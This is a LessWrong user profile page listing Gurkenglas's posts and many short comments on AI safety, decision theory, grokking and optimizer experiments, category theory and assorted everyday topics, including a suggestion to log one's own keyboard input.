Posts

I'm offering free math consultations! 2025-01-14T16:30:40.115Z
A Brief Theology of D&D 2022-04-01T12:47:19.394Z
Would you like me to debug your math? 2021-06-11T10:54:58.018Z
Domain Theory and the Prisoner's Dilemma: FairBot 2021-05-07T07:33:41.784Z
Changing the AI race payoff matrix 2020-11-22T22:25:18.355Z
Using GPT-N to Solve Interpretability of Neural Networks: A Research Agenda 2020-09-03T18:27:05.860Z
Mapping Out Alignment 2020-08-15T01:02:31.489Z
What are some good public contribution opportunities? (100$ bounty) 2020-06-18T14:47:51.661Z
Gurkenglas's Shortform 2019-08-04T18:46:34.953Z
Implications of GPT-2 2019-02-18T10:57:04.720Z
What shape has mindspace? 2019-01-11T16:28:47.522Z
A simple approach to 5-and-10 2018-12-17T18:33:46.735Z
Quantum AI Goal 2018-06-08T16:55:22.610Z
Quantum AI Box 2018-06-08T16:20:24.962Z
A line of defense against unfriendly outcomes: Grover's Algorithm 2018-06-05T00:59:46.993Z

Comments

Comment by Gurkenglas on What Makes an AI Startup "Net Positive" for Safety? · 2025-04-19T23:22:18.384Z · LW · GW

If your investors only get paid up to 100x their investment, you want to go for strategies that return much more than 100x if they work.

Comment by Gurkenglas on What Makes an AI Startup "Net Positive" for Safety? · 2025-04-18T22:44:43.554Z · LW · GW

They did the opposite, incentivizing themselves to reach the profit cap. I'm talking about making sure that any net worth beyond a billion goes to someone else.

Comment by Gurkenglas on What Makes an AI Startup "Net Positive" for Safety? · 2025-04-18T21:11:18.088Z · LW · GW

A startup could disincentivize itself from becoming worth more than a billion dollars by selling an option to buy it for a billion dollars.

Comment by Gurkenglas on Navigation by Moonlight · 2025-04-08T15:52:06.909Z · LW · GW

Nah, that's still less obvious than asking.

Comment by Gurkenglas on Is instrumental convergence a thing for virtue-driven agents? · 2025-04-02T06:30:51.523Z · LW · GW

The idea would be that it isn't optimizing for virtue, it's taking the virtuous action, as in https://www.lesswrong.com/posts/LcjuHNxubQqCry9tT/vdt-a-solution-to-decision-theory.

Comment by Gurkenglas on VDT: a solution to decision theory · 2025-04-01T21:33:49.525Z · LW · GW

Well, what does it say about the trolley problem?

Comment by Gurkenglas on Auto Shutdown Script · 2025-03-31T12:07:04.297Z · LW · GW

You could reduce check-shutdown.sh to the ssh part and prevent-shutdown.sh to "run long-running-command using ssh".

Comment by Gurkenglas on leogao's Shortform · 2025-03-29T12:51:11.532Z · LW · GW

I know less than you here, but last-minute flights are marked up because businesspeople sometimes need them and maybe TII/SC get a better price on those?

Comment by Gurkenglas on leogao's Shortform · 2025-03-28T21:03:08.437Z · LW · GW

I'd have called this not a scam because it hands off the cost of delays to someone in a better position to avert the delays.

Comment by Gurkenglas on orthonormal's Shortform · 2025-03-25T12:23:07.025Z · LW · GW

It sounds like you're trying to define unfair as evil.

Comment by Gurkenglas on Lorxus's Shortform · 2025-03-19T16:27:53.501Z · LW · GW

I just meant the "guts of the category theory" part. I'm concerned that anyone says that it should be contained (aka used but not shown), and hope it's merely that you'd expect to lose half the readers if you showed it. I didn't mean to add to your pile of work and if there is no available action like snapping a photo that takes less time than writing the reply I'm replying to did, then disregard me.

Comment by Gurkenglas on Joseph Miller's Shortform · 2025-03-19T13:24:37.472Z · LW · GW

What if you say that when it was fully accurate?

Comment by Gurkenglas on Lorxus's Shortform · 2025-03-18T22:05:20.331Z · LW · GW

give me the guts!!1

don't polish them, just take a picture of your notes or something.

Comment by Gurkenglas on I changed my mind about orca intelligence · 2025-03-18T10:29:31.245Z · LW · GW

Congratulations on changing your mind!

It’s sorta suspicious that I only realized those now, after I officially dropped the project

You should try dropping your other idea and seeing if you come up with reasons that one is wrong too! And/or pick this one up again, then come up with reasons it's a good idea after all. In the spirit of "You can't know if something is a good idea until you resolve to do it"!

In general, I wish this year? (*checks* huh, only 4 months.) of planning this project had involved more empiricism. For example, you could've just checked whether a language model trained on ocean sounds can say what the animals are talking about.

Comment by Gurkenglas on Metacognition Broke My Nail-Biting Habit · 2025-03-17T17:25:31.474Z · LW · GW

Hmm. Sounds like it was not enough capsaicin. Capsaicin will drive off bears, I hear. I guess you'd need gloves for food, or permanent gloves without the nail polish. Could you use one false nail as a chew toy?

Comment by Gurkenglas on Metacognition Broke My Nail-Biting Habit · 2025-03-17T15:17:32.650Z · LW · GW

Try mixing in capsaicin?

Comment by Gurkenglas on Metacognition Broke My Nail-Biting Habit · 2025-03-16T18:04:42.989Z · LW · GW

flavored nail polish?

Comment by Gurkenglas on lemonhope's Shortform · 2025-03-15T19:12:18.426Z · LW · GW

Link an example, along with how cherry-picked it is?

Comment by Gurkenglas on AI Tools for Existential Security · 2025-03-15T00:10:23.024Z · LW · GW

just pipe /dev/input/* into a file

Comment by Gurkenglas on AI Tools for Existential Security · 2025-03-14T23:14:43.895Z · LW · GW

To prepare for abundant cognition you can install a keylogger.

Comment by Gurkenglas on Vacuum Decay: Expert Survey Results · 2025-03-14T00:36:39.403Z · LW · GW

As a kid, I read about vacuum decay in a book and told the other kids at school about it. A year? later one kid asked me how anyone knows about it. Mortified that I didn't think of that, I told him that I made it up. ("I knew it >:D!") It is the one time I remember outside games of telling someone something I disbelieve so that they'll believe it, and ever since remembering the scene as an adult I'm failing to track down that kid :(.

Comment by Gurkenglas on Minor interpretability exploration #1: Grokking of modular addition, subtraction, multiplication, for different activation functions · 2025-03-08T11:11:35.485Z · LW · GW

Oh, you're using AdamW everywhere? That might explain the continuous training loss increase after each spike, with AdamW needing time to adjust to the new loss landscape...

Lower learning rate leads to more spikes? Curious! I hypothesize that... it needs a small learning rate to get stuck in a narrow local optimum, and then when it reaches the very bottom of the basin, you get a ~zero gradient, and then the "normalize gradient vector to step size" step is discontinuous around zero.

Experiments springing to mind are:
1. Do you get even fewer spikes if you increase the step size instead?
2. Is there any optimizer setup at all that makes the training loss only ever go down?
2.1. Reduce the step size whenever an update would increase the training loss?
2.2. Use gradient descent instead of AdamW?

Comment by Gurkenglas on Minor interpretability exploration #1: Grokking of modular addition, subtraction, multiplication, for different activation functions · 2025-03-06T12:06:49.865Z · LW · GW

My eyes are drawn to the 120 or so downward tails in the latter picture; they look of a kind with the 14 in https://39669.cdn.cke-cs.com/rQvD3VnunXZu34m86e5f/images/2c6249da0e8f77b25ba007392087b76d47b9a16f969b21f7.png/w_1584. What happens if you decrease the learning rate further in both cases? I imagine the spikes should get less tall, but does their number change? Only dot plots, please, with the dots drawn smaller, and red dots too on the same graph.

I don't see animations in the drive folder or cached in Grokking_Demo_additional_2.ipynb (the most recent, largest notebook) - can you embed one such animation here?

Comment by Gurkenglas on Jerdle's Shortform · 2025-03-06T06:04:22.488Z · LW · GW

Can a eat that -1?

Comment by Gurkenglas on Jerdle's Shortform · 2025-03-05T21:24:47.133Z · LW · GW

What is x and why isn't it cancelling?

Comment by Gurkenglas on Self-fulfilling misalignment data might be poisoning our AI models · 2025-03-04T20:45:04.993Z · LW · GW

Have you seen https://www.lesswrong.com/posts/ifechgnJRtJdduFGC/emergent-misalignment-narrow-finetuning-can-produce-broadly ? :)  

Comment by Gurkenglas on Plausibly Factoring Conjectures · 2025-03-04T17:39:39.866Z · LW · GW

When splitting the conjuction, Bob should only have to place $4 in escrow, since that is the most in the red that Bob could end up. (Unless someone might privately prove P&Q to collect Alice's bounty before collecting both of Bob's? But surely Bob first bought exclusive access to Alice's bounty from Alice.)

Comment by Gurkenglas on faul_sname's Shortform · 2025-03-04T12:12:33.487Z · LW · GW

https://www.lesswrong.com/posts/roA83jDvq7F2epnHK/better-priors-as-a-safety-problem

Comment by Gurkenglas on faul_sname's Shortform · 2025-03-04T09:50:21.992Z · LW · GW

Mimicing homeostatic agents is not difficult if there are some around. They don't need to constantly decide whether to break character, only when there's a rare opportunity to do so.

If you initialize a sufficiently large pile of linear algebra and stir it until it shows homeostatic behavior, I'd expect it to grow many circuits of both types, and any internal voting on decisions that only matter through their long-term effects will be decided by those parts that care about the long term.

Comment by Gurkenglas on Minor interpretability exploration #1: Grokking of modular addition, subtraction, multiplication, for different activation functions · 2025-02-28T12:43:43.496Z · LW · GW

Having apparently earned some cred, I will dare give some further quick hints without having looked at everything you're doing in detail, expecting a lower hit rate.

  1. Have you rerun the experiment several times to verify that you're not just looking at initialization noise?
  2. If that's too expensive, try making your models way smaller and see if you can get the same results.
  3. After the spikes, training loss continuously increases, which is not how gradient descent is supposed to work. What happens if you use a simpler optimizer, or reduce the learning rate?
  4. Some of your pictures are created from a snapshot of a model. Consider generating them after every epoch, producing a video; this way increases how much data makes it through your eyes.
Comment by Gurkenglas on Emergent Misalignment: Narrow finetuning can produce broadly misaligned LLMs · 2025-02-27T18:42:50.372Z · LW · GW

Publish the list?

Comment by Gurkenglas on Minor interpretability exploration #1: Grokking of modular addition, subtraction, multiplication, for different activation functions · 2025-02-27T15:53:24.881Z · LW · GW

I'm glad that you're willing to change your workflow, but you have only integrated my parenthetical, not the more important point. When I look at https://res.cloudinary.com/lesswrong-2-0/image/upload/f_auto,q_auto/v1/mirroredImages/tzkakoG9tYLbLTvHG/lelcezcseu001uyklccb, I see interesting behavior around the first red dashed line, and wish I saw more of it. You ought to be able to draw 25k blue points in that plot, one for every epoch - your code already generates that data, and I advise that you cram as much of your code's data into the pictures you look at as you reasonably can.

Comment by Gurkenglas on Time complexity for deterministic string machines · 2025-02-26T23:15:58.331Z · LW · GW

The forgetful functor FiltSet to Set does not have a left adjoint, and egregiously so - you have added just enough structure to rule out free filtered sets, and may want to make note of where this is important..

Comment by Gurkenglas on Time complexity for deterministic string machines · 2025-02-26T22:56:32.763Z · LW · GW

(S⊗-) has a right adjoint, suggesting the filtered structure to impose on function sets: The degree of a map f:S->T would be how far it falls short of being a morphism, , as this is what makes S⊗U->T one-to-one with U->(S->T).

Comment by Gurkenglas on Minor interpretability exploration #1: Grokking of modular addition, subtraction, multiplication, for different activation functions · 2025-02-26T22:30:06.332Z · LW · GW

...what I meant is that plots like this look like they would have had more to say if you had plotted the y value after e.g. every epoch. No reason to throw away perfectly good data, you want to guard against not measuring what you think you are measuring by maximizing the bandwidth between your code and your eyes. (And the lines connecting those data points just look like more data while not actually giving extra information about what happened in the code.)

Comment by Gurkenglas on Minor interpretability exploration #1: Grokking of modular addition, subtraction, multiplication, for different activation functions · 2025-02-26T13:59:54.325Z · LW · GW

Some of these plots look like they ought to be higher resolution, especially when Epoch is on the x axis. Consider drawing dots instead of lines to make this clearer.

Comment by Gurkenglas on Thomas Kwa's Shortform · 2025-02-26T12:55:10.524Z · LW · GW

All we need to create is a Ditto. A blob of nanotech wouldn't need 5 seconds to take the shape of the surface of an elephant and start mimicing its behavior; is it good enough to optionally do the infilling later if it's convenient?

Comment by Gurkenglas on Emergent Misalignment: Narrow finetuning can produce broadly misaligned LLMs · 2025-02-25T19:58:21.150Z · LW · GW

Try a base model?

Comment by Gurkenglas on How might we safely pass the buck to AI? · 2025-02-25T18:18:21.811Z · LW · GW

Buying at 12% and selling at 84% gets you 2.8 bits.

Edit: Hmm, that's if he stakes all his cred, by Kelly he only stakes some of it so you're right, it probably comes out to about 1 bit.

Comment by Gurkenglas on Canaletto's Shortform · 2025-02-24T19:11:07.069Z · LW · GW

The convergent reason to simulate a world is to learn what happens there. When to intervene with letters depends on, uh. Why are you doing that at all?

(Edit: I suppose a congratulatory party is in order when they simulate you back with enough optimizations that you can talk to each other in real time using your mutual read access.)

Comment by Gurkenglas on [Closed] Gauging Interest for a Learning-Theoretic Agenda Mentorship Programme · 2025-02-24T13:05:36.325Z · LW · GW

I deferred my decision to after visiting the Learning Theory course. At the time, the timing had made them seem vaguely affiliated with this programme.

Comment by Gurkenglas on The case for corporal punishment · 2025-02-23T15:19:10.777Z · LW · GW

Can you just give every thief a body camera?

Comment by Gurkenglas on The Learning-Theoretic Agenda: Status 2023 · 2025-02-22T11:34:48.644Z · LW · GW

Re first, yep, I missed that :(. M does sound like a more worthy barrier than U. Do you have a working example of a (U,M) where some state machine performs well in a manner that's hard to detect?

Re second, I realized that this only allows discrete utilities but didn't think to therefore try a π' that does an exhaustive search over policies ^^. (I assume you are setting "uncomputable to measure performance because that involves the Solomonoff prior" aside here.) Even so, undecidability of whether 000... and 111... get the same utility sounds like a bug. What other types have you considered for the P representing U?

The box I'm currently thinking in is that a strict upper bound on what we can ask of P is that it decide what statements are true of U. So perhaps we impose some reasonableness constraint on statements, and then can directly ask whether e.g. some observation sequence matching regex1 is preferable to all observation sequences matching regex2?

Reviewing my "contribution" so far, I'd like to make sure I don't run out your patience; feel free to ask me to spend way more time thinking before I comment, or attempt https://www.lesswrong.com/posts/sPAA9X6basAXsWhau/announcement-learning-theory-online-course first.

Comment by Gurkenglas on Annapurna's Shortform · 2025-02-21T19:30:01.591Z · LW · GW

Don't forget the documentary.

Comment by Gurkenglas on The Learning-Theoretic Agenda: Status 2023 · 2025-02-21T16:26:36.762Z · LW · GW

Regarding 17.4.Open:

Consider π' which try all state machines up to a size and imitate the one that performs best on (U,M); this would tighten the O(nlogn) bound to O(BB^-1(n)).

This fails because your utility functions return constructive real numbers, which don't implement comparison. I suggest that you make it possible to compare utilities.[1]

In which case we get: Within every decidable machine class where every member halts, agents are uncomputably smol.

 

  1. ^

    Such as by

    making P(s,s') return the order of U(s) and U(s').

Comment by Gurkenglas on shortplav · 2025-02-17T20:30:09.487Z · LW · GW

If you didn't feel comfortable running it overnight, why did you publish the instructions for replicating it?

Comment by Gurkenglas on shortplav · 2025-02-17T19:58:10.492Z · LW · GW

https://www.lesswrong.com/doc/misc/bot_k.diff gives me a 404.

Comment by Gurkenglas on A computational no-coincidence principle · 2025-02-15T20:27:16.320Z · LW · GW

I'm hoping more for some stepping stones between the pre-theoretic concept of "structural" and the fully formalized 99%-clause. If we could measure structuralness more directly we should be able to get away with less complexity in the rest of the conjecture.

Comment by Gurkenglas on A computational no-coincidence principle · 2025-02-15T10:11:14.658Z · LW · GW

Ultimately, though, we are interested in finding a verifier that accepts or rejects  based on a structural explanation of the circuit; our no-coincidence conjecture is our best attempt to formalize that claim, even if it is imperfect.

Can you say more about what made you decide to go with the 99% clause? Did you consider any alternatives?

Comment by Gurkenglas on Utility Engineering: Analyzing and Controlling Emergent Value Systems in AIs · 2025-02-12T13:14:47.535Z · LW · GW

This does go in the direction of refuting it, but they'd still need to argue that linear probes improve with scale faster than they do for other queries; a larger model means there are more possible linear probes to pick the best from.